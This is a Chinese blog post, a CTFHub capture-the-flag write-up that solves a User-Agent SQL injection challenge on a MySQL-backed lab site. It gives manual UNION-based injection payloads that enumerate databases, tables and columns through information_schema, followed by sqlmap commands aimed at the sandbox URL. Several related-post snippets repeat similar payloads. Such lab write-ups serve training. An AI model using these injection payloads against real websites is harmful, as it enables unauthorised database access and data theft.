CTFHUB-技能树-Web题-SQL注入-Mysql结构-UA注入

已于 2024-05-09 21:13:59 修改
阅读量609 收藏 3
点赞数 28
分类专栏: CTFHUB解题思路 文章标签: sql mysql 数据库
于 2024-04-08 21:27:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137524337
版权

技能树-Web题-SQL注入-Mysql结构-UA注入

文章目录

UA注入

UA注入,即User-Agent注入

手工注入

利用bp抓包,发送至repeater进行判断

看提示

在这里插入图片描述

注入点在User-Agent

虽然有提示,在此还是按常规进行一下注入点判断吧

判断注入点
抓包后,输入1 and 1=1 有回显

在这里插入图片描述

输入 1 and 1=2 无回显

在这里插入图片描述

由此判断,此处为注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

由此判断,表中有两个字段

判断回显字段数
-1 union select 1,2

在这里插入图片描述

1,2都回显,由此判断可回显字段数为2

爆库名
-1 union select user(),database()

在这里插入图片描述

得到数据库名为sqli

爆表名
-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

得到两个表名,尝试查看第一个表中的数据

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name='pqqvoicejs'

在这里插入图片描述

得到列名xwprqxhxjd

爆数据

-1 union select user(),group_concat(xwprqxhxjd) from sqli.pqqvoicejs

在这里插入图片描述

得到flag

sqlmap

UA注入 需要用到leve 3

爆库
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/ -level 3 --dbs --batch

在这里插入图片描述

爆表
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli --tables --batch

在这里插入图片描述

爆列名
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz --columns  --batch

在这里插入图片描述

爆数据
sqlmap -u http://challenge-24633b96e4dbb170.sandbox.ctfhub.com:10800/  --level 3 -D sqli -T zcvvebogfz -C glotmiduat --dump --batch

在这里插入图片描述

python炒粉
关注
  • 28
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHUB-WEB-SQL注入-MySql结构
weixin_49539962的博客
08-05 94
终于不是用flag做表名,下面依次看两个表的内容就行。news之前几都与flag出现过,应该是把flag换成pvrxgcvlli。前面的几用的都是MySQL的数据库,所以这里的解法其实和整数型、字符型注入区别不大。按提示输入一个1,回显有两列,看看这两列是不是都有用。那接下来就依次看数据库名、表名、列名和flag名就行。
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 793
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-SQL注入-MySQL结构
weixin_68416970的博客
06-13 533
用到sqlmap工具,没有sqlmap工具点击直达下载安装使用教程。
CTFHub技能之WEB:UA注入
weixin_48799157的博客
03-20 2034
小白一个,如有错误请指正! UA就是User-Agent的缩写,中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计。 个人感觉UA注入和Cookie注入是有点像的,都是从请求头中修改参数,payload和普通的union注入是一样的。 解法一: Burps...
CTFhub技能web-SQL注入
Mccc_li的博客
04-05 1239
1.数字型 1 and 1=1 正常输出 1 and 1=2 不输出 存在数字型注入,接下来猜字段 1 order by 1,2输出正常 1 order by 1,2,3不输出,所以有两个字段 1 and 1=2 union select 1,database(),看数据库名字 1,group_concat(table_name)from information_schema.table...
CTFHub技能web(持续更新)--SQL注入--UA注入
jiuyongpinyin的博客
09-05 461
UA注入 首先根据目的提示,告诉我们输入点在User-Agent,所以我们抓包进行尝试: 我们发现了返回值不光有user-agent的数据,前面还有查询语句,那么我们输入一个1试一下: 到了这里是不是有点熟悉了,和上一篇cookie注入一样了,那么我就不废话,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库的表名: 得到了奇怪的表名,查看这个里面的列: 得到列,查询里面的字段: 得到flag 注:萌新
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
07-08
"计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究" 本研究论文主要研究了基于Web应用的SQL注入攻击入侵检测技术,以解决当前Web应用系统中常见的SQL注入漏洞问。论文首先对SQL注入攻击的基本概念和原理进行了...
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
07-08
这导致现有的SQL注入渗透测试无法充分测试Web应用程序的防御机制,无法发现隐藏在不完善的防御机制背后的SQL注入漏洞,从而产生假阴性结果,降低了测试的准确性。 本文旨在通过改进SQL注入渗透测试用例来提高SQL...
MySQL 面试-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL等数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
MySQL面试篇章——MySQL核心SQL(基本语法)
itzzan的博客
07-17 610
扩展:group by 查询慢,explain 分析发现是 Using temporary,即产生了一个临时表,因此最好给分组列添加索引。数据控制语句,用于控制不同的许可和访问级别的语句。每次的 insert 操作都会有一个数据库连接操作,是占用资源的,一次连接完成的事情肯定比多次连接完成的事情所花费的时间短。数据操纵语句,用于添加、删除、更新和查询数据库记录,并检查数据完整性,常用的语句关键字主要包括。低,pageNum的偏移所花费的性能,要先偏移到对应的位置,在进行分页拿去后面的数据记录。
PostgreSQL 中如何解决因大量并发删除和插入操作导致的索引抖动?
技术笔记
07-17 423
索引抖动是 PostgreSQL 中一个常见的问,它会对数据库的性能产生严重的影响。通过采用批量操作、分区表、索引优化和调整数据库参数等方法,我们可以有效地解决索引抖动问,提高数据库的性能和稳定性。在实际应用中,我们应该根据具体情况选择合适的解决方案,并不断地进行优化和调整,以满足业务的需求。解决索引抖动问就像是一场战斗,我们需要根据敌人(问)的特点和弱点,选择合适的武器(解决方案),并灵活运用战术(优化方法),才能取得最终的胜利。
国产精品ORM框架-SqlSugar详解 SqlSugar初识 附案例源码 云草桑 专
cao919的专栏Net
07-13 754
国产精品ORM框架-SqlSugar详解 1、SqlSugar初识 2、开始实操 3、增删改操作 4、进阶功能 5优美的表达式、仓储、UnitOfWork、DbContext、AOP `代码先行,先有代码,然后有数据库,只关注业务,业务中的对象如果需要就直接创建实体,对应的数。简单易用、功能齐全、高性能、轻量级、服务齐全、官网教程文档、有专业技术支持一天18小时。支持 完整的SAAS一套应用 跨库查询 、租户分库 、租户分表 和 租户数据隔离。数据库的结构完全由代码来决定,数据库表--主键、自增,字段类型。
接口开发:Orcal数据库的批量新增sql
qq_65032048的博客
07-17 395
场景:在日常的CURD中一定会用到批量新增。在我们的项目中,使用的数据库是Orcal,由于之前基本都是使用Mysql的,使用的sql语句也基本都是用mysql的。但是在这次的接口编写时用mysql的批量新增出了问,刚开始我还以为是写的动态sql有问,在后续的问修改也主要是对动态sql修改,因此也浪费了大量的时间,在后续把sql搬到数据库运行一下后才发现是sql的问,同时也了解到了mysql和orcal 也是有很多地方是不同的。
NoSql选择
2301_79659699的博客
07-16 477
5. (单选, 3分)MongoDB是一种NoSQL数据库,具体地说,是( )存储数据库。13. (单选, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。7. (单选, 3分)CAP理论是NoSQL理论的基础,下列性质不属于CAP的是( )。11. (单选, 3分)下列关于NoSQL数据库和关系型数据库的比较,不正确的是( )。8. (单选, 3分)于NoSQL数据库和关系数据库,下列说法不正确的是( )。6. (单选, 3分)NoSQL数据库是指( )数据存储系统。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 948
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
【PostgreSQL】Windows 上安装 PostgreSQL 16版本
最新发布
No8g攻城狮的博客
07-17 563
✌全网粉丝20W+,CSDN博客专家、Java领域优质创作者,掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域✌。
怎样在 PostgreSQL 中优化对大表的并发读取操作?
技术笔记
07-15 898
在 PostgreSQL 中,大表通常是指包含大量数据的表。这些表可能有数百万、数千万甚至数十亿条记录。当我们处理这样的大表时,查询操作可能会变得非常缓慢,特别是在并发读取的情况下。并发读取操作是指多个进程或线程同时从数据库中读取数据的操作。在实际应用中,并发读取操作是非常常见的,例如多个用户同时查询一个报表或者多个系统同时获取数据进行分析。优化 PostgreSQL 中对大表的并发读取操作是一个综合性的任务,需要我们从多个方面入手。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值